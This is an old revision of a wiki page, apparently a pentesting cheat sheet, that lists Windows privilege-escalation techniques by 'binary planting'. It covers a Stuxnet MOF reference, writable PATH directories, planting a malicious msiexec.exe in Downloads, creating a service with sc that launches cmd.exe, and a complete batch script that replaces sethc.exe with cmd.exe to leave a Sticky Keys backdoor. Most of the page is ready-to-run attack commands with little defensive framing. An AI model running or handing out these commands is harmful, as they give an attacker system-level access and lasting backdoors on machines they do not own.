Wiki

**Ceci est une ancienne révision du document !** ----

====== Bienvenue sur le Wiki SpX ====== Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges. ^Command ^Description / Importance | |''%SystemRoot<nowiki>%\</nowiki>System32<nowiki>\</nowiki>wbem<nowiki>\</nowiki>mof<nowiki>\</nowiki>'' |Taken from Stuxnet: [[http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf|http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf]] Look for Print spooler vulnerability. | |''echo $PATH'' |Check the $PATH environmental variable. Some directories may be writable. See: [[https://www.htbridge.com/advisory/HTB23108|https://www.htbridge.com/advisory/HTB23108]] | |''msiexec.exe'' |Idea taken from here: [[http://goo.gl/E3LTa|http://goo.gl/E3LTa]] - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. | |''sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys'' |Create malicious services. | |''Replacing file as: sethc.exe \\ @echo off \\ c: > nul<nowiki>\</nowiki>cd<nowiki>\</nowiki> > nul<nowiki>\</nowiki>cd %SYSTEMROOT<nowiki>%\</nowiki>System32<nowiki>\</nowiki> > nul \\ if exist %SYSTEMROOT<nowiki>%\</nowiki>System32<nowiki>\</nowiki>cmdsys<nowiki>\</nowiki> rd /q %SYSTEMROOT<nowiki>%\</nowiki>System32<nowiki>\</nowiki>cmdsys<nowiki>\</nowiki> > nul \\ cmd %SYSTEMROOT<nowiki>%\</nowiki>System32<nowiki>\</nowiki>cmdsys<nowiki>\</nowiki> > nul \\ copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul \\ copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul \\ copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul \\ copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul \\ exit'' |By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. | \\